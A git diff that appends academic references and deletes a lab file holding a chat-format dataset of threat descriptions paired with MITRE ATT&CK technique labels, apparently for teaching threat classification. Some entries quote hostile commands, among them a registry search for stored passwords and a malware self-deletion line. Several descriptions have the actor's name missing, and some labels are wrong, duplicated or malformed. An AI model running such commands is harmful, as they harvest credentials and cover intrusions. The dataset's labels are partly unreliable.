+123 Gallup, G.G. (Jr.). 1997. On the rise and fall of self-conception in primates. In The Self Across Psychology— self-recognition, self-awareness, and the Self Concept. Annals of the NY Acad. Sci. 818:4-17
+124 Carstairs-McCarthy, A. 2004. Many perspectives, no concensus—a review of Language Evolution, by Christiansen & Kirby (Eds). Science 303:1299-1300.
+125Dijksterhuis, A., et al. 2006. Science 311:1005-1007.
+126Vince, G 2006. “'Sleeping on it' best for complex decisions.” Newscientist.com, http://www.newscientist.com/channel/being-human/dn8732.html.
+127 Devlin, A.M., et al. 2003. Clinical outcomes of hemispherectomy for epilepsy in childhood and adolescence Brain 126: 556-566.
+128 Pulsifer, M,B., et al. 2004. The cognitive outcome of hemispherectomy in 71 children. Epilepsia. 45: 243-54.
+129 Moles, A., Keiffer, B.L., and F.R. D'Amato. 2004. Deficit in attachment behavior in mice lacking the -Opioid receptor gene. Science 304: 1983-1986.
+130 Plane, J.M.C., et al. 2004. Removal of meteoric iron on polar mesospheric clouds. Science 304: 426-428.
+131 Fitch, W.T., and M.D. Hauser. 2004. Computational Constraints on Syntactic Processing in a Nonhuman Primate. Science 303:377-380.
+132 Premack, D. 2004. Is Language the Key to Human Intelligence? Science 303: 318-320
+133 Holden, C. 2004. The origin of speech. Science 303: 1316-1319.
+134 Graddol, D. 2004. The future of language. Science 303: 1329-1331.
+135 BBC News. 2005. Brain chip reads man's thoughts. March 31. Story online at http://news.bbc.co.uk/go/pr/fr/-/1/hi/health/4396387.stm
+136 Weng, J. et al. 2001. Autonomous Mental Development by Robots and Animals. Science 291: 599-600.
+137 Von Melchner, L, et al. 2000. Visual behaviour mediated by retinal projections directed to the auditory pathway. Nature 404: 871-876.
+138 Baughman, R.H. 2003. Muscles made from metal. Science 300: 268-269.
+139 Weissmüller, J., et al. 2003. Change-induced reversible strain in a metal. Science 300: 312-315.
+140 Piper, A., and Merskey, H. 2004. The Persistence of Folly: A Critical Examination of Dissociative Identity Disorder. Part I. The Excesses of an Improbable Concept. Can. J. Psychiatry 49: 592-600.
+141 Piper, A., and Merskey, H. 2004. The Persistence of Folly: A Critical Examination of Dissociative Identity Disorder. Part II. The Defence and Decline of Multiple Personality or Dissociative Identity Disorder. Can. J. Psychiatry 49: 678–683.
+142 Kaplan, F.S., et al. 1998. The Molecules of Immobility: Searching for the Skeleton Key. Univ. Pennsylvania Orthopaedic J. 11: 59-66. Available online at http://www.uphs.upenn.edu/ortho/oj/1998/oj11sp98p59.html
+143 Chernoff, H. 1973. Using faces to represent points in k-dimensional space graphically. Journal of the Americal Statistical Association 68:361-368.
+144 Wilkinson, L. 1982. An experimental evaluation of multivariate graphical point representations. Human Factors in Computer Systems: Proceedings. Gaithersberg, MD, 202-209.
\ No newline at end of file
diff --git a/content/labs/lab-6-embedding-and-chunking_files/combined_big_mitre.json b/content/labs/lab-6-embedding-and-chunking_files/combined_big_mitre.json
deleted file mode 100644
index a825d8b..0000000
--- a/content/labs/lab-6-embedding-and-chunking_files/combined_big_mitre.json
+++ /dev/null
@@ -1,900754 +0,0 @@
-[
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Dust Storm, the threat actors established domains as part of their operational infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "reg query HKLM /f password /t REG_SZ /s"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although the developers attempt to use a denylist of files and directories to skip, it was observed encrypting core Windows operating system files, which caused the operating system to become unstable and crash. This was observed when running the ransomware on a Windows 2012 machine"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has obtained and used Empire for post-exploitation activities."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy uses cmd.exe to execute commands on the system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can browse file systems using a file manager module."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HIDEDRV is a rootkit that hides certain operating system artifacts."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has gathered information about local network connections using ."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deep Panda has updated and modified its malware, resulting in different hash values that evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.005 - Indicator Removal from Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The impact of finding this implant on your network is severe and most likely indicates the presence of other footholds or compromised systems. This backdoor provides ample capability for the attacker to propagate and compromise other hosts and critical data using this as a very stealthy beachhead"
- },
- {
- "role": "assistant",
- "content": "T1556.004 - Network Device Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has connected to C2 servers via HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro - The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Filename Part-I.doc File Size 11349102 bytes MD5 92942c54224cd462dd201ae11a560bb8 SHA1 85a21624df2211af3daf05c86a3fbea8271059d3 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Here, we show an example of a PDF campaign as seen from the point of view of the affected user. This malicious PDF only contains a URL to entice the user to view the file. If the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. Browser redirection Finally, the malicious Word document is opened and the VBA macro code is run after the user allows for the editing of the content within Word. This eventually kickstarts the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to the disk drive by one of the previous stages. Malicious Word document The decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit and cannot be relied upon for attribution. Decoy document opened in Word"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot has retrieved PuTTY credentials by querying the \"Software\\SimonTatham\\Putty\\Sessions\" registry key"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A payload uses process hollowing to hide the UAC bypass vulnerability exploitation inside svchost.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered."
- },
- {
- "role": "assistant",
- "content": "T1587.003 - Digital Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\\Users\\<Redacted Username>\\Desktop\\OWAExchange"
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has exfiltrated stolen victim data through C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors have been known to copy files to the network shares of other computers to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc uses HTTP over SSL to communicate commands with the control server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Putty to access compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT supports file encryption (AES with the key \"lolomycin2017\")."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pony can download additional files onto the infected system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to download files from the infected host to the command and control (C2) server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actors operate a Kubernetes cluster, which allows them to conduct distributed and large-scale targeting using password spray and password guessing"
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of performing keylogging."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Regarding to downloading and executing a tool, Flagpro stores the downloaded file in file path “%Temp%\\~MY[0-9A-F].tmp” first. Then, Flagpro adds extension “.exe” to the name of stored file and executes the file"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses reg add to add a Registry Run key for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has sent spearphishing attachments attempting to get a user to open them."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has deleted arbitrary Registry values."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cryptoistic can engage in encrypted communications with C2."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Python/TeleBot malware uses exactly the same approach; the Python backdoor code is obfuscated and packed into a standalone executable using PyInstaller. In addition, the Python code is ROT13 encoded, AES encrypted, compressed using zlib library and then Base64 encoded"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has enumerated the host machine’s IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611)."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre has a command to download and executes additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch can monitor for removable drives being plugged into the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Command Functionality Init Create a reverse shell Write Write a file to the compromised system from the C2 server List List the files in a directory Upload Upload a file from the compromised system to the C2 server Table 2"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can write and execute PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A Destover-like variant used by uses a batch file mechanism to delete its binaries from the system."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack can collect the victim's computer name, hostname and adapter information to create a unique identifier."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET identifies the macOS version and uses \"ioreg\" to determine serial number."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER can use base64 encoded C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation', 'T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke has commands to get the time the machine was built, the time, and the time zone."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can upload files from a compromised host over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can exfiltrate collected documents through C2 channels."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can check the name of the window displayed on the system."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using: cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL All the following capabilities described are implemented by the malicious service DLL implant unless specified. Variant using North Korean Red Cross Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The crimeware toolkit has refined its detection of sandbox analysis environments by inspecting the process list and Registry."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap uses the keychaindump project to read securityd memory."
- },
- {
- "role": "assistant",
- "content": "T1555.002 - Securityd Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 obtained information about the configured Exchange virtual directory using \"Get-WebServicesVirtualDirectory\"."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has used a keylogger."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "stages collected data in a text file."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
